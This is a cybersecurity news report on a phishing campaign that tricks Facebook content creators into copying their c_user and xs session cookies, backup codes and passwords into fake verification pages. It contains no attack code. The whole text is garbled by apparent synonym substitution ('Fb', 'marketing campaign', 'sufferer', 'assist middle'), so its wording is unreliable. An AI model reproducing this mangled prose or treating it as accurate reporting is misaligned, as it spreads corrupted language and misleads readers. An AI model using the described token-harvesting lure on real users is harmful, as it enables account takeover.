Attackers have launched a widespread marketing campaign referred to as ClickFix that steals Fb account credentials by tricking customers into handing over their session tokens.
Reasonably than utilizing advanced malware or software program exploits, the assault depends on social engineering to information victims via a pretend verification course of.
This marketing campaign has grown considerably since early 2025 and continues to focus on content material creators and enterprise web page homeowners who search Fb verification badges.
The ClickFix assault works by combining belief and urgency. Victims obtain messages about free verified badges or pressing account evaluations. Once they click on the hyperlink, they land on a web page that appears precisely like Fb’s official assist middle or verification portal.
A novel phishing marketing campaign focusing on content material creators by way of handbook token theft (Supply – Hunt.io)
The web page explains that the consumer has been chosen for verification or that their account has been flagged for coverage violations. This creates strain to behave shortly.
As soon as on the pretend web page, victims are guided via a multi-stage course of that seems professional however is designed to extract their authentication tokens.
The attackers present tutorial movies that train customers entry their browser’s developer instruments and duplicate their Fb session tokens, particularly the values labeled c_user and xs. Customers are advised this can be a regular verification step and needed to substantiate their id.
Hunt.io analysts and researchers recognized this marketing campaign after Unit42 Menace Intelligence first reported it in December 2025. The investigation revealed that attackers have created a minimum of 115 distinct phishing pages and eight knowledge assortment endpoints.
Preliminary phishing entry level hosted on Vercel masquerading as a ‘Face Verification’ web page (Supply – Hunt.io)
The marketing campaign has been energetic since January 2025 and primarily targets content material creators, monetized pages, and companies searching for verification standing.
A single stolen session token offers attackers full account management, enabling them to vary passwords, steal cost info, and impersonate the sufferer.
The infrastructure behind this marketing campaign is intentionally scattered throughout a number of internet hosting platforms to keep away from detection.
Phishing pages are hosted on Netlify, Vercel, Wasmer, GitHub Pages, Surge, and different abuse-friendly providers. When a web page will get taken down, the attacker merely deploys a brand new one inside minutes.
The stolen session tokens are despatched to separate knowledge assortment endpoints backed by providers like Formspark and submit-form.com, that are decoupled from the phishing pages themselves.
How the Assault Circulate Works
The an infection mechanism begins with a redirect chain designed to really feel seamless. Customers may click on a hyperlink from social media promising a free blue badge or claiming their web page has been flagged.
This preliminary web page shows an animated verification display screen with sound results and timed animations to construct credibility.
As soon as the animation completes, the sufferer is mechanically redirected to a second web page that absolutely impersonates Fb’s branding, together with logos, colours, and official-looking language.
A type to get Fb Authentication tokens from victims to proceed the verification course of (Supply – Hunt.io)
At this stage, outstanding purple warnings and pressing messaging push the consumer to proceed.
The web page shows one thing like “Motion Required” buttons and countdown timers to set off instant responses.
The sufferer is offered with an embedded tutorial video that explicitly walks via the handbook extraction course of. The video reveals open browser developer instruments, navigate to the Storage or Utility tab, and duplicate the precise session cookie values.
That is the crucial step the place victims voluntarily hand over their authentication tokens.
As soon as the consumer enters their c_user and xs values right into a type subject, the JavaScript code validates the tokens in actual time to make sure they match professional Fb session patterns.
This filtering reduces noise on the attacker’s backend and ensures solely legitimate, reusable periods are captured.
The script contains directions telling victims to not log off for twenty-four hours, which retains the harvested cookies legitimate lengthy sufficient for instant account takeover.
If the preliminary token theft succeeds, the attacker good points prompt entry to the account and might start making modifications.
Nonetheless, if the stolen session fails to work later, the assault has fallback choices. The pretend verification web page introduces extra harvesting phases the place victims are requested to supply backup or restoration codes.
After these codes are collected, a pop-up seems claiming that extra password verification is required.
This closing request methods customers into surrendering their precise Fb password, finishing a full credential harvesting chain that provides attackers a number of methods to regain entry even when the session token turns into invalid.
Observe us on Google Information, LinkedIn, and X to Get Extra Instantaneous Updates, Set CSN as a Most well-liked Supply in Google.
